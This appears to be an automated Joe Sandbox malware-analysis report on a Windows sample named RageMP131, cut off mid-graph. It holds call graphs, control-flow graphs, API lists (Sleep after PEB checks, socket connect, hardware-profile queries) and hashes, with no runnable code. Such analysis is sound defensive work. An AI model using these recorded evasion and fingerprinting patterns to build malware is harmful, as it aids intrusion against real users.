3bf537 __Getctype 19720->19721 19721->19718 19722 3b0259 __Getctype RtlAllocateHeap 19721->19722 19723 3bf573 19722->19723 19725 3b5bdb __Getctype RtlAllocateHeap 19724->19725 19726 3bd823 19725->19726 19727 3bd736 std::_Locinfo::_Locinfo_dtor RtlAllocateHeap RtlAllocateHeap 19726->19727 19728 3bd82e 19727->19728 19728->19713 19730 3a480d __fread_nolock 19729->19730 19731 3a4814 19730->19731 19732 3a4835 __fread_nolock 19730->19732 19733 3a4723 ___std_exception_copy RtlAllocateHeap 19731->19733 19736 3a4910 19732->19736 19735 3a482d 19733->19735 19735->19555 19739 3a4942 19736->19739 19738 3a4922 19738->19735 19740 3a4979 19739->19740 19741 3a4951 19739->19741 19743 3b5f82 __fread_nolock RtlAllocateHeap 19740->19743 19742 3a4723 ___std_exception_copy RtlAllocateHeap 19741->19742 19751 3a496c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19742->19751 19744 3a4982 19743->19744 19752 3ae11f 19744->19752 19747 3a4a2c 19755 3a4cae 19747->19755 19749 3a4a43 19749->19751 19763 3a4ae3 19749->19763 19751->19738 19770 3adf37 19752->19770 19754 3a49a0 19754->19747 19754->19749 19754->19751 19756 3a4cbd 19755->19756 19757 3b5f82 __fread_nolock RtlAllocateHeap 19756->19757 19758 3a4cd9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19757->19758 19759 3ae11f 2 API calls 19758->19759 19762 3a4ce5 _ValidateLocalCookies 19758->19762 19760 3a4d39 19759->19760 19761 3ae11f 2 API calls 19760->19761 19760->19762 19761->19762 19762->19751 19764 3b5f82 __fread_nolock RtlAllocateHeap 19763->19764 19765 3a4af6 19764->19765 19766 3ae11f 2 API calls 19765->19766 19769 3a4b40 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19765->19769 19767 3a4b9d 19766->19767 19768 3ae11f 2 API calls 19767->19768 19767->19769 19768->19769 19769->19751 19771 3adf43 __fread_nolock 19770->19771 19772 3adf86 19771->19772 19774 3adfcc 19771->19774 19775 3adf4b 19771->19775 19773 3a4723 ___std_exception_copy RtlAllocateHeap 19772->19773 19773->19775 19774->19775 19776 3ae05c __fread_nolock 2 API calls 19774->19776 19775->19754 19776->19775 19778 3306a9 19777->19778 19782 330585 19777->19782 19779 2c2270 RtlAllocateHeap 19778->19779 19780 3306ae 19779->19780 19781 2c21d0 Concurrency::cancel_current_task RtlAllocateHeap 19780->19781 19790 3305aa __fread_nolock std::locale::_Locimp::_Locimp 19781->19790 19784 3305e3 19782->19784 19785 3305f0 19782->19785 19787 33059a 19782->19787 19783 39f290 std::_Facet_Register RtlAllocateHeap 19783->19790 19784->19780 19784->19787 19788 39f290 std::_Facet_Register RtlAllocateHeap 19785->19788 19785->19790 19786 3a47b0 RtlAllocateHeap 19789 3306b8 19786->19789 19787->19783 19788->19790 19790->19786 19791 330667 __fread_nolock std::locale::_Locimp::_Locimp 19790->19791 19791->19561 19794 3adc08 __fread_nolock 19792->19794 19793 3adc40 __fread_nolock 19793->19565 19794->19793 19795 3adc52 __fread_nolock 19794->19795 19796 3adc1b __fread_nolock 19794->19796 19801 3ada06 19795->19801 19797 3ad23f __dosmaperr RtlAllocateHeap 19796->19797 19799 3adc35 19797->19799 19800 3a47a0 ___std_exception_copy RtlAllocateHeap 19799->19800 19800->19793 19803 3ada18 __fread_nolock 19801->19803 19807 3ada35 19801->19807 19802 3ada25 19804 3ad23f __dosmaperr RtlAllocateHeap 19802->19804 19803->19802 19803->19807 19809 3ada76 __fread_nolock 19803->19809 19805 3ada2a 19804->19805 19806 3a47a0 ___std_exception_copy RtlAllocateHeap 19805->19806 19806->19807 19807->19793 19808 3adba1 __fread_nolock 19812 3ad23f __dosmaperr RtlAllocateHeap 19808->19812 19809->19807 19809->19808 19811 3b5f82 __fread_nolock RtlAllocateHeap 19809->19811 19814 3b4623 19809->19814 19873 3a8a2b 19809->19873 19811->19809 19812->19805 19815 3b464d 19814->19815 19816 3b4635 19814->19816 19818 3b498f 19815->19818 19822 3b4690 19815->19822 19817 3ad22c __dosmaperr RtlAllocateHeap 19816->19817 19819 3b463a 19817->19819 19820 3ad22c __dosmaperr RtlAllocateHeap 19818->19820 19821 3ad23f __dosmaperr RtlAllocateHeap 19819->19821 19823 3b4994 19820->19823 19824 3b4642 19821->19824 19822->19824 19825 3b469b 19822->19825 19831 3b46cb 19822->19831 19826 3ad23f __dosmaperr RtlAllocateHeap 19823->19826 19824->19809 19827 3ad22c __dosmaperr RtlAllocateHeap 19825->19827 19833 3b46a8 19826->19833 19828 3b46a0 19827->19828 19830 3ad23f __dosmaperr RtlAllocateHeap 19828->19830 19829 3a47a0 ___std_exception_copy RtlAllocateHeap 19829->19824 19830->19833 19832 3b46e4 19831->19832 19834 3b471f 19831->19834 19835 3b46f1 19831->19835 19832->19835 19839 3b470d 19832->19839 19833->19829 19887 3b6e2d 19834->19887 19836 3ad22c __dosmaperr RtlAllocateHeap 19835->19836 19838 3b46f6 19836->19838 19841 3ad23f __dosmaperr RtlAllocateHeap 19838->19841 19842 3c0d44 __fread_nolock RtlAllocateHeap 19839->19842 19844 3b46fd 19841->19844 19858 3b486b 19842->19858 19843 3b6db3 __freea RtlAllocateHeap 19845 3b4739 19843->19845 19846 3a47a0 ___std_exception_copy RtlAllocateHeap 19844->19846 19847 3b6db3 __freea RtlAllocateHeap 19845->19847 19872 3b4708 __fread_nolock 19846->19872 19851 3b4740 19847->19851 19848 3b48e3 ReadFile 19849 3b48fb 19848->19849 19850 3b4957 19848->19850 19849->19850 19852 3b48d4 19849->19852 19860 3b4964 19850->19860 19869 3b48b5 19850->19869 19853 3b474a 19851->19853 19854 3b4765 19851->19854 19863 3b4920 19852->19863 19864 3b4937 19852->19864 19852->19872 19855 3ad23f __dosmaperr RtlAllocateHeap 19853->19855 19857 3ae13d __fread_nolock 2 API calls 19854->19857 19861 3b474f 19855->19861 19856 3b6db3 __freea RtlAllocateHeap 19856->19824 19857->19839 19858->19848 19859 3b489b 19858->19859 19859->19852 19859->19869 19862 3ad23f __dosmaperr RtlAllocateHeap 19860->19862 19865 3ad22c __dosmaperr RtlAllocateHeap 19861->19865 19866 3b4969 19862->19866 19898 3b4335 19863->19898 19864->19872 19908 3b417b 19864->19908 19865->19872 19870 3ad22c __dosmaperr RtlAllocateHeap 19866->19870 19869->19872 19893 3ad1e5 19869->19893 19870->19872 19872->19856 19874 3a8a3c 19873->19874 19878 3a8a38 std::locale::_Locimp::_Locimp 19873->19878 19875 3a8a43 19874->19875 19879 3a8a56 __fread_nolock 19874->19879 19876 3ad23f __dosmaperr RtlAllocateHeap 19875->19876 19877 3a8a48 19876->19877 19880 3a47a0 ___std_exception_copy RtlAllocateHeap 19877->19880 19878->19809 19879->19878 19881 3a8a84 19879->19881 19883 3a8a8d 19879->19883 19880->19878 19882 3ad23f __dosmaperr RtlAllocateHeap 19881->19882 19884 3a8a89 19882->19884 19883->19878 19885 3ad23f __dosmaperr RtlAllocateHeap 19883->19885 19886 3a47a0 ___std_exception_copy RtlAllocateHeap 19884->19886 19885->19884 19886->19878 19888 3b6e6b 19887->19888 19889 3b6e3b __dosmaperr std::_Facet_Register 19887->19889 19891 3ad23f __dosmaperr RtlAllocateHeap 19888->19891 19889->19888 19890 3b6e56 RtlAllocateHeap 19889->19890 19890->19889 19892 3b4730 19890->19892 19891->19892 19892->19843 19894 3ad22c __dosmaperr RtlAllocateHeap 19893->19894 19895 3ad1f0 __dosmaperr 19894->19895 19896 3ad23f __dosmaperr RtlAllocateHeap 19895->19896 19897 3ad203 19896->19897 19897->19872 19912 3b402e 19898->19912 19901 3b43d7 19905 3b4391 __fread_nolock 19901->19905 19906 3ae13d __fread_nolock 2 API calls 19901->19906 19902 3b43c7 19903 3ad23f __dosmaperr RtlAllocateHeap 19902->19903 19904 3b437d 19903->19904 19904->19872 19905->19904 19907 3ad1e5 __dosmaperr RtlAllocateHeap 19905->19907 19906->19905 19907->19904 19909 3b41b5 19908->19909 19910 3b4246 19909->19910 19911 3ae13d __fread_nolock 2 API calls 19909->19911 19910->19872 19911->19910 19913 3b4062 19912->19913 19914 3b40ce 19913->19914 19915 3ae13d __fread_nolock 2 API calls 19913->19915 19914->19901 19914->19902 19914->19904 19914->19905 19915->19914 19917 3a8acf __fread_nolock 19916->19917 19918 3a8ad9 19917->19918 19920 3a8afc __fread_nolock 19917->19920 19919 3a4723 ___std_exception_copy RtlAllocateHeap 19918->19919 19921 3a8af4 19919->19921 19920->19921 19923 3a8b5a 19920->19923 19921->19569 19924 3a8b8a 19923->19924 19925 3a8b67 19923->19925 19927 3a55d3 4 API calls 19924->19927 19935 3a8b82 19924->19935 19926 3a4723 ___std_exception_copy RtlAllocateHeap 19925->19926 19926->19935 19928 3a8ba2 19927->19928 19937 3b6ded 19928->19937 19931 3b5f82 __fread_nolock RtlAllocateHeap 19932 3a8bb6 19931->19932 19941 3b4a3f 19932->19941 19935->19921 19936 3b6db3 __freea RtlAllocateHeap 19936->19935 19938 3b6e04 19937->19938 19940 3a8baa 19937->19940 19939 3b6db3 __freea RtlAllocateHeap 19938->19939 19938->19940 19939->19940 19940->19931 19942 3b4a68 19941->19942 19945 3a8bbd 19941->19945 19943 3b4ab7 19942->19943 19946 3b4a8f 19942->19946 19944 3a4723 ___std_exception_copy RtlAllocateHeap 19943->19944 19944->19945 19945->19935 19945->19936 19948 3b49ae 19946->19948 19949 3b49ba __fread_nolock 19948->19949 19951 3b49f9 19949->19951 19952 3b4b12 19949->19952 19951->19945 19953 3ba6de __fread_nolock RtlAllocateHeap 19952->19953 19954 3b4b22 19953->19954 19956 3b4b5a 19954->19956 19958 3ba6de __fread_nolock RtlAllocateHeap 19954->19958 19961 3b4b28 19954->19961 19957 3ba6de __fread_nolock RtlAllocateHeap 19956->19957 19956->19961 19959 3b4b66 FindCloseChangeNotification 19957->19959 19960 3b4b51 19958->19960 19959->19961 19962 3ba6de __fread_nolock RtlAllocateHeap 19960->19962 19964 3ba64d 19961->19964 19962->19956 19963 3b4b80 __fread_nolock 19963->19951 19965 3ba65c 19964->19965 19966 3ad23f __dosmaperr RtlAllocateHeap 19965->19966 19969 3ba686 19965->19969 19967 3ba6c8 19966->19967 19968 3ad22c __dosmaperr RtlAllocateHeap 19967->19968 19968->19969 19969->19963

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 515 323a40-323a52 516 323a55-323a61 515->516 518 323a67-323a6d 516->518 519 323b28-323b31 GetPEB 516->519 518->519 521 323a73-323a7f GetPEB 518->521 520 323b34-323b48 519->520 522 323b4a-323b4f 520->522 523 323b99-323b9b 520->523 524 323a80-323a94 521->524 522->523 525 323b51-323b59 522->525 523->520 526 323a96-323a9b 524->526 527 323ae4-323ae6 524->527 528 323b60-323b73 525->528 526->527 529 323a9d-323aa3 526->529 527->524 530 323b92-323b97 528->530 531 323b75-323b88 528->531 532 323aa5-323ab8 529->532 530->523 530->528 531->531 533 323b8a-323b90 531->533 534 323aba 532->534 535 323add-323ae2 532->535 533->530 537 323b9d-323bc2 Sleep 533->537 536 323ac0-323ad3 534->536 535->527 535->532 536->536 538 323ad5-323adb 536->538 537->516 538->535 539 323ae8-323b0d Sleep 538->539 540 323b13-323b1a 539->540 540->519 541 323b1c-323b22 540->541 541->519 542 323bc7-323bd8 call 2c6bd0 541->542 545 323bda-323bdc 542->545 546 323bde 542->546 547 323be0-323bfd call 2c6bd0 545->547 546->547
                                  APIs
                                  • Sleep.KERNELBASE(000003E9,?,00000001,00000000,?,?,?,?,?,?,?,?,00323DB6), ref: 00323B08
                                  • Sleep.KERNELBASE(00000001,?,00000001,00000000,?,?,?,?,?,?,?,?,00323DB6), ref: 00323BBA
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 71ed90e01c1aed8083a70a097ba5ab8ead6a3b687c4e4d6190e9172bfe2c6271
                                  • Instruction ID: 91dc85d17f3bae4b57190b649c487a2b525e381dd4a0a78a30bf23758c18063d
                                  • Opcode Fuzzy Hash: 71ed90e01c1aed8083a70a097ba5ab8ead6a3b687c4e4d6190e9172bfe2c6271
                                  • Instruction Fuzzy Hash: E851DB35A042298FCB26CF48D8D0EAAB7B5FF48704F2A45AAD445AF351D735EE05CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 2de0a0-2de0d2 WSAStartup 1 2de0d8-2de102 call 2c6bd0 * 2 0->1 2 2de1b7-2de1c0 0->2 7 2de10e-2de165 1->7 8 2de104-2de108 1->8 10 2de167-2de16d 7->10 11 2de1b1 7->11 8->2 8->7 12 2de16f 10->12 13 2de1c5-2de1cf 10->13 11->2 14 2de175-2de189 socket 12->14 13->11 17 2de1d1-2de1d9 13->17 14->11 16 2de18b-2de19b connect 14->16 18 2de19d-2de1a5 closesocket 16->18 19 2de1c1 16->19 18->14 20 2de1a7-2de1ab 18->20 19->13 20->11
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupclosesocketconnectsocket
                                  • String ID:
                                  • API String ID: 3098855095-0
                                  • Opcode ID: 1ad525fec809e1d9a1d1448ce24afe92b518e95eb00c348dc32251ec83b61205
                                  • Instruction ID: af7f4545d7030fc19157390074eea9d8a7df52d351a552e5f45b6674b940bc67
                                  • Opcode Fuzzy Hash: 1ad525fec809e1d9a1d1448ce24afe92b518e95eb00c348dc32251ec83b61205
                                  • Instruction Fuzzy Hash: 4631B4717153016BDB209F298848B2BB7E4EB86764F014F1EF9A8A63D0D375DD148BA2

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10915
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154267256.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e10000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: af$kQZ^
                                  • API String ID: 2104809126-3757534479
                                  • Opcode ID: 2726adb349a2cbc5de4b95cd98235c306983ca2d0fcf4acaf7a59f9cd3abf9d0
                                  • Instruction ID: d313c1e8b3acf1ad6d9b5f63e830764677e6d0bcbe7bc1c84ee8bc6754417fb3
                                  • Opcode Fuzzy Hash: 2726adb349a2cbc5de4b95cd98235c306983ca2d0fcf4acaf7a59f9cd3abf9d0
                                  • Instruction Fuzzy Hash: 775145F73CD215EDE14292815B20AFA66ADE7D7330730A0A7F107C6E22F2942AC97571

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 90 39f290-39f293 91 39f2a2-39f2a5 call 3adf2c 90->91 93 39f2aa-39f2ad 91->93 94 39f2af-39f2b0 93->94 95 39f295-39f2a0 call 3b17d8 93->95 95->91 98 39f2b1-39f2b5 95->98 99 39f2bb 98->99 100 2c21d0-2c2220 call 2c21b0 call 3a0efb call 3a0651 98->100 99->99
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 002C220E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: `!,$`!,
                                  • API String ID: 2659868963-131796292
                                  • Opcode ID: b98c0836f34af107737a736fb2a735cc9b8bd2b82c2110377a4073ac3ac69d35
                                  • Instruction ID: b57cb395a27a42587f7a4215873edfaa2b57a53ff93080de2b9c04a48af21253
                                  • Opcode Fuzzy Hash: b98c0836f34af107737a736fb2a735cc9b8bd2b82c2110377a4073ac3ac69d35
                                  • Instruction Fuzzy Hash: 8E012B7950030DAFCF1AAF98E802E9977ACDA01310B548539FA59DF991EB70E9548790

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10915
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154267256.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e10000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: kQZ^
                                  • API String ID: 2104809126-1822040756
                                  • Opcode ID: 3fae23fe90edf24e9895fca884ec0846bc43a00af33b149e86d06f13685bc144
                                  • Instruction ID: 1fa4c073c4bfe8437751c6eb539180456aa40cc1adce26b8826a12384d276844
                                  • Opcode Fuzzy Hash: 3fae23fe90edf24e9895fca884ec0846bc43a00af33b149e86d06f13685bc144
                                  • Instruction Fuzzy Hash: 425134F73CD215EDE14292915B24AFA26ADE7C7330730A0A7F107CAD22F2942AC97571

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10915
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154267256.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e10000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: kQZ^
                                  • API String ID: 2104809126-1822040756
                                  • Opcode ID: bf845019a1eeb672ee41f47d3f73fd6ad8be3f98b1425b85d497a80aed4f5419
                                  • Instruction ID: 78adf9844a5ba7e4953ae5398a06eadbf6e2e7e5a5b2e7668dba779becc697e3
                                  • Opcode Fuzzy Hash: bf845019a1eeb672ee41f47d3f73fd6ad8be3f98b1425b85d497a80aed4f5419
                                  • Instruction Fuzzy Hash: 085138F73CD219EDE14291904B54AFA26ADF7D733073060A7B107D6D22F2942AC97571

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10915
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154267256.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e10000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: kQZ^
                                  • API String ID: 2104809126-1822040756
                                  • Opcode ID: 3db4df05bf5852f483caf74da701456763f2f79347106f1e1d6b84d853f4ec60
                                  • Instruction ID: 346da235162c6cd5caefe0ed990272aacaf9724f76e482d59d8dce48f6a00bdb
                                  • Opcode Fuzzy Hash: 3db4df05bf5852f483caf74da701456763f2f79347106f1e1d6b84d853f4ec60
                                  • Instruction Fuzzy Hash: EB5156FB3CD115EDE14291910B24AFA2A6DE7C7330730A0A7F147CAE22F2942AC97571

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E10915
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4154267256.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_4e10000_RageMP131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID: kQZ^
                                  • API String ID: 2104809126-1822040756
                                  • Opcode ID: ccd505b473511ffeb6974183630a2ac58064a0d9e25df96bc8554b1d58e0c4cf
                                  • Instruction ID: 82145cfe610d495adbf2035bd31ab038aee34da3c632b285d05b98fbbf5986ef
                                  • Opcode Fuzzy Hash: ccd505b473511ffeb6974183630a2ac58064a0d9e25df96bc8554b1d58e0c4cf
                                  • Instruction Fuzzy Hash: 7F4136FB3CD115EDE14292911B24EFA666DE7D7330730A0A7B10BC6E22F2942AC97571

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 360 3a4942-3a494f 361 3a4979-3a498d call 3b5f82 360->361 362 3a4951-3a4974 call 3a4723 360->362 368 3a498f 361->368 369 3a4992-3a499b call 3ae11f 361->369 367 3a4ae0-3a4ae2 362->367 368->369 371 3a49a0-3a49af 369->371 372 3a49bf-3a49c8 371->372 373 3a49b1 371->373 376 3a49ca-3a49d7 372->376 377 3a49dc-3a4a10 372->377 374 3a4a89-3a4a8e 373->374 375 3a49b7-3a49b9 373->375 381 3a4ade-3a4adf 374->381 375->372 375->374 378 3a4adc 376->378 379 3a4a6d-3a4a79 377->379 380 3a4a12-3a4a1c 377->380 378->381 384 3a4a7b-3a4a82 379->384 385 3a4a90-3a4a93 379->385 382 3a4a1e-3a4a2a 380->382 383 3a4a43-3a4a4f 380->383 381->367 382->383 386 3a4a2c-3a4a3e call 3a4cae 382->386 383->385 387 3a4a51-3a4a6b call 3a4e59 383->387 384->374 388 3a4a96-3a4a9e 385->388 386->381 387->388 391 3a4ada 388->391 392 3a4aa0-3a4aa6 388->392 391->378 393 3a4aa8-3a4abc call 3a4ae3 392->393 394 3a4abe-3a4ac2 392->394 393->381 398 3a4ac4-3a4ad2 call 3c4a10 394->398 399 3a4ad5-3a4ad7 394->399 398->399 399->391
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Offset: 002C0000, based on PE: true
                                  • Associated: 0000000B.00000002.4145586988.00000000002C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4146169733.00000000003F3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147265146.00000000003F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000003FC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.0000000000585000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.000000000066B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006A0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006AC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4147307095.00000000006BA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148027108.00000000006BB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 0000000B.00000002.4148347497.0000000000862000.00000040.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_2c0000_RageMP131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: O:
                                  • API String ID: 0-1127995068
                                  • Opcode ID: 8ed38200a054be15eb2fd55e798bacc87c6ec1d92598dd95a83dc30ca6f77a59
                                  • Instruction ID: 505034c5702062155f2dbba11dd310682df43c0c5f60d6e4eff5772046c36150
                                  • Opcode Fuzzy Hash: 8ed38200a054be15eb2fd55e798bacc87c6ec1d92598dd95a83dc30ca6f77a59
                                  • Instruction Fuzzy Hash: 2D51C970A00108AFDF16CF58CC45AAABFF5EF8A354F258158F8499B252D3B1DE51CB94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 403 3b4623-3b4633 404 3b464d-3b464f 403->404 405 3b4635-3b4648 call 3ad22c call 3ad23f 403->405 407 3b498f-3b499c call 3ad22c call 3ad23f 404->407 408 3b4655-3b465b 404->408 419 3b49a7 405->419 427 3b49a2 call 3a47a0 407->427 408->407 410 3b4661-3b468a 408->410 410->407 413 3b4690-3b4699 410->413 416 3b469b-3b46ae call 3ad22c call 3ad23f 413->416 417 3b46b3-3b46b5 413->417 416->427 422 3b498b-3b498d 417->422 423 3b46bb-3b46bf 417->423 425 3b49aa-3b49ad 419->425 422->425 423->422 424 3b46c5-3b46c9 423->424 424->416 429 3b46cb-3b46e2 424->429 427->419 431 3b4717-3b471d 429->431 432 3b46e4-3b46e7 429->432 436 3b471f-3b4726 431->436 437 3b46f1-3b4708 call 3ad22c call 3ad23f call 3a47a0 431->437 434 3b46e9-3b46ef 432->434 435 3b470d-3b4715 432->435 434->435 434->437 439 3b478a-3b47a9 435->439 440 3b472a-3b472b call 3b6e2d 436->440 441 3b4728 436->441 468 3b48c2 437->468 444 3b47af-3b47bb 439->444 445 3b4865-3b486e call 3c0d44 439->445 447 3b4730-3b4748 call 3b6db3 * 2 440->447 441->440 444->445 446 3b47c1-3b47c3 444->446 457 3b48df 445->457 458 3b4870-3b4882 445->458 446->445 450 3b47c9-3b47ea 446->450 471 3b474a-3b4760 call 3ad23f call 3ad22c 447->471 472 3b4765-3b4788 call 3ae13d 447->472 450->445 454 3b47ec-3b4802 450->454 454->445 459 3b4804-3b4806 454->459 463 3b48e3-3b48f9 ReadFile 457->463 458->457 462 3b4884-3b4893 458->462 459->445 466 3b4808-3b482b 459->466 462->457 481 3b4895-3b4899 462->481 464 3b48fb-3b4901 463->464 465 3b4957-3b4962 463->465 464->465 469 3b4903 464->469 483 3b497b-3b497e 465->483 484 3b4964-3b4976 call 3ad23f call 3ad22c 465->484 466->445 470 3b482d-3b4843 466->470 473 3b48c5-3b48cf call 3b6db3 468->473 476 3b4906-3b4918 469->476 470->445 477 3b4845-3b4847 470->477 471->468 472->439 473->425 476->473 485 3b491a-3b491e 476->485 477->445 486 3b4849-3b4860 